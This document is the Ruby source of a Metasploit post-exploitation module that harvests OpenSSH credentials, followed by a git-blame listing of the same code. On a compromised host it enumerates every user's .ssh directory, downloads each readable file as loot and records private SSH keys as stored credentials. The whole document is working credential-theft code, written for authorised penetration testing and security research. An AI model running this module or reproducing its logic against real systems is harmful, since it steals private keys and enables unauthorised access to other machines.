modules/post/multi/gather/ssh_creds.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'sshkey'

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Unix

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Multi Gather OpenSSH PKI Credentials Collection',
        'Description' => %q{
          This module will collect the contents of all users' .ssh directories on the targeted
          machine. Additionally, known_hosts and authorized_keys and any other files are also
          downloaded. This module is largely based on firefox_creds.rb.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Jim Halfpenny'],
        'Platform' => %w[bsd linux osx unix],
        'SessionTypes' => ['meterpreter', 'shell' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_fs_ls
              stdapi_fs_separator
            ]
          }
        }
      )
    )
  end

  def run
    print_status('Finding .ssh directories')
    paths = enum_user_directories.map { |d| d + '/.ssh' }
    # Array#select! is only in 1.9
    paths = paths.select { |d| directory?(d) }

    if paths.nil? || paths.empty?
      print_error('No users found with a .ssh directory')
      return
    end

    print_status("Looting #{paths.count} .ssh directories")
    download_loot(paths)
  end

  def download_loot(paths)
    paths.each do |path|
      path.chomp!

      print_status("Looting #{path} directory")

      unless executable?(path)
        print_warning("Cannot access directory: #{path} . Missing execute permission. Skipping.")
        next
      end

      if session.type == 'meterpreter'
        sep = session.fs.file.separator
        files = session.fs.dir.entries(path)
      else
        # Guess, but it's probably right
        sep = '/'
        files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)
      end
      path_array = path.split(sep)
      path_array.pop
      user = path_array.pop
      files.each do |file|
        next if ['.', '..'].include?(file)

        file_path = "#{path}#{sep}#{file}"

        unless readable?(file_path)
          print_warning("Cannot read file: #{file_path} . Missing read permission. Skipping.")
          next
        end

        data = read_file("#{path}#{sep}#{file}")
        file = file.split(sep).last

        loot_path = store_loot("ssh.#{file}", 'text/plain', session, data, "ssh_#{file}", "OpenSSH #{file} File")
        print_good("Downloaded #{path}#{sep}#{file} -> #{loot_path}")

        # store only ssh private keys
        next if SSHKey.valid_ssh_public_key? data

        begin
          key = SSHKey.new(data, passphrase: '')

          credential_data = {
            origin_type: :session,
            session_id: session_db_id,
            post_reference_name: refname,
            private_type: :ssh_key,
            private_data: key.key_object.to_s,
            username: user,
            workspace_id: myworkspace_id
          }

          create_credential(credential_data)
        rescue OpenSSL::OpenSSLError => e
          print_error("Could not load SSH Key: #{e.message}")
        end
      end
    end
  end
end
Multi platform ssh_cred post module by Jim Halfpenny, modified the calls to be cmd_exec and added method to identify proper platform in the case the platform is not properly set for the session like in the case of ssh_login aux module. 2011-06-01 12:46:27 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Multi platform ssh_cred post module by Jim Halfpenny, modified the calls to be cmd_exec and added method to identify proper platform in the case the platform is not properly set for the session like in the case of ssh_login aux module. 2011-06-01 12:46:27 +00:00			`##`

Make ssh_creds store keys as creds 2012-06-19 14:24:32 -06:00			`require 'sshkey'`
Multi platform ssh_cred post module by Jim Halfpenny, modified the calls to be cmd_exec and added method to identify proper platform in the case the platform is not properly set for the session like in the case of ssh_login aux module. 2011-06-01 12:46:27 +00:00
use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Post`
Retab changes for PR #2304 2013-09-05 13:41:25 -05:00			`include Msf::Post::File`
			`include Msf::Post::Unix`
Multi platform ssh_cred post module by Jim Halfpenny, modified the calls to be cmd_exec and added method to identify proper platform in the case the platform is not properly set for the session like in the case of ssh_login aux module. 2011-06-01 12:46:27 +00:00
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Multi Gather OpenSSH PKI Credentials Collection',`
			`'Description' => %q{`
Msftidy fixes, also use correct possessive plurals 2013-08-05 09:43:38 -05:00			`This module will collect the contents of all users' .ssh directories on the targeted`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`machine. Additionally, known_hosts and authorized_keys and any other files are also`
			`downloaded. This module is largely based on firefox_creds.rb.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => ['Jim Halfpenny'],`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`'Platform' => %w[bsd linux osx unix],`
Add Meterpreter compatibility metadata 2021-10-06 13:43:31 +01:00			`'SessionTypes' => ['meterpreter', 'shell' ],`
			`'Compat' => {`
			`'Meterpreter' => {`
			`'Commands' => %w[`
			`stdapi_fs_ls`
			`stdapi_fs_separator`
			`]`
			`}`
			`}`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`)`
			`)`
Multi platform ssh_cred post module by Jim Halfpenny, modified the calls to be cmd_exec and added method to identify proper platform in the case the platform is not properly set for the session like in the case of ssh_login aux module. 2011-06-01 12:46:27 +00:00			`end`

			`def run`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`print_status('Finding .ssh directories')`
			`paths = enum_user_directories.map { \|d\| d + '/.ssh' }`
Array#select! is only in 1.9 2012-06-26 15:32:16 -06:00			`# Array#select! is only in 1.9`
			`paths = paths.select { \|d\| directory?(d) }`
reworked some logic 2011-07-27 15:12:28 +00:00
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`if paths.nil? \|\| paths.empty?`
			`print_error('No users found with a .ssh directory')`
Multi platform ssh_cred post module by Jim Halfpenny, modified the calls to be cmd_exec and added method to identify proper platform in the case the platform is not properly set for the session like in the case of ssh_login aux module. 2011-06-01 12:46:27 +00:00			`return`
			`end`

post/multi/gather/ssh_creds should verify it has access to a file before reading it 2019-11-21 10:48:42 +01:00			`print_status("Looting #{paths.count} .ssh directories")`
Multi platform ssh_cred post module by Jim Halfpenny, modified the calls to be cmd_exec and added method to identify proper platform in the case the platform is not properly set for the session like in the case of ssh_login aux module. 2011-06-01 12:46:27 +00:00			`download_loot(paths)`
			`end`

			`def download_loot(paths)`
			`paths.each do \|path\|`
			`path.chomp!`
Fix style 2019-12-04 19:24:43 -06:00
post/multi/gather/ssh_creds should verify it has access to a file before reading it 2019-11-21 10:48:42 +01:00			`print_status("Looting #{path} directory")`
Fix style 2019-12-04 19:24:43 -06:00
post/multi/gather/ssh_creds should verify it has access to a file before reading it 2019-11-21 10:48:42 +01:00			`unless executable?(path)`
Fix style 2019-12-04 19:24:43 -06:00			`print_warning("Cannot access directory: #{path} . Missing execute permission. Skipping.")`
post/multi/gather/ssh_creds should verify it has access to a file before reading it 2019-11-21 10:48:42 +01:00			`next`
			`end`

Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`if session.type == 'meterpreter'`
Make ssh_creds store keys as creds 2012-06-19 14:24:32 -06:00			`sep = session.fs.file.separator`
			`files = session.fs.dir.entries(path)`
Multi platform ssh_cred post module by Jim Halfpenny, modified the calls to be cmd_exec and added method to identify proper platform in the case the platform is not properly set for the session like in the case of ssh_login aux module. 2011-06-01 12:46:27 +00:00			`else`
Make ssh_creds store keys as creds 2012-06-19 14:24:32 -06:00			`# Guess, but it's probably right`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`sep = '/'`
Make ssh_creds store keys as creds 2012-06-19 14:24:32 -06:00			`files = cmd_exec("ls -1 #{path}").split(/\r\n\|\r\|\n/)`
Multi platform ssh_cred post module by Jim Halfpenny, modified the calls to be cmd_exec and added method to identify proper platform in the case the platform is not properly set for the session like in the case of ssh_login aux module. 2011-06-01 12:46:27 +00:00			`end`
Msftidy fixes, also use correct possessive plurals 2013-08-05 09:43:38 -05:00			`path_array = path.split(sep)`
			`path_array.pop`
			`user = path_array.pop`
Make ssh_creds store keys as creds 2012-06-19 14:24:32 -06:00			`files.each do \|file\|`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`next if ['.', '..'].include?(file)`
Fix style 2019-12-04 19:24:43 -06:00
			`file_path = "#{path}#{sep}#{file}"`

			`unless readable?(file_path)`
			`print_warning("Cannot read file: #{file_path} . Missing read permission. Skipping.")`
post/multi/gather/ssh_creds should verify it has access to a file before reading it 2019-11-21 10:48:42 +01:00			`next`
			`end`

Make ssh_creds store keys as creds 2012-06-19 14:24:32 -06:00			`data = read_file("#{path}#{sep}#{file}")`
			`file = file.split(sep).last`

Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`loot_path = store_loot("ssh.#{file}", 'text/plain', session, data, "ssh_#{file}", "OpenSSH #{file} File")`
Fix #5134 , Put store_loot back 2015-04-17 16:33:51 -05:00			`print_good("Downloaded #{path}#{sep}#{file} -> #{loot_path}")`
refactor ssh_creds post module 2014-06-09 11:49:49 -05:00
ssh_creds module tries to store ssh public keys (#1 ) 2019-11-18 21:28:47 +01:00			`# store only ssh private keys`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`next if SSHKey.valid_ssh_public_key? data`

			`begin`
			`key = SSHKey.new(data, passphrase: '')`

			`credential_data = {`
			`origin_type: :session,`
			`session_id: session_db_id,`
			`post_reference_name: refname,`
			`private_type: :ssh_key,`
			`private_data: key.key_object.to_s,`
			`username: user,`
			`workspace_id: myworkspace_id`
			`}`

			`create_credential(credential_data)`
			`rescue OpenSSL::OpenSSLError => e`
			`print_error("Could not load SSH Key: #{e.message}")`
Make ssh_creds store keys as creds 2012-06-19 14:24:32 -06:00			`end`
Fix bug #5688 . Some distros might have a different location for command uname 2011-10-17 03:55:05 +00:00			`end`
Multi platform ssh_cred post module by Jim Halfpenny, modified the calls to be cmd_exec and added method to identify proper platform in the case the platform is not properly set for the session like in the case of ssh_login aux module. 2011-06-01 12:46:27 +00:00			`end`
			`end`
			`end`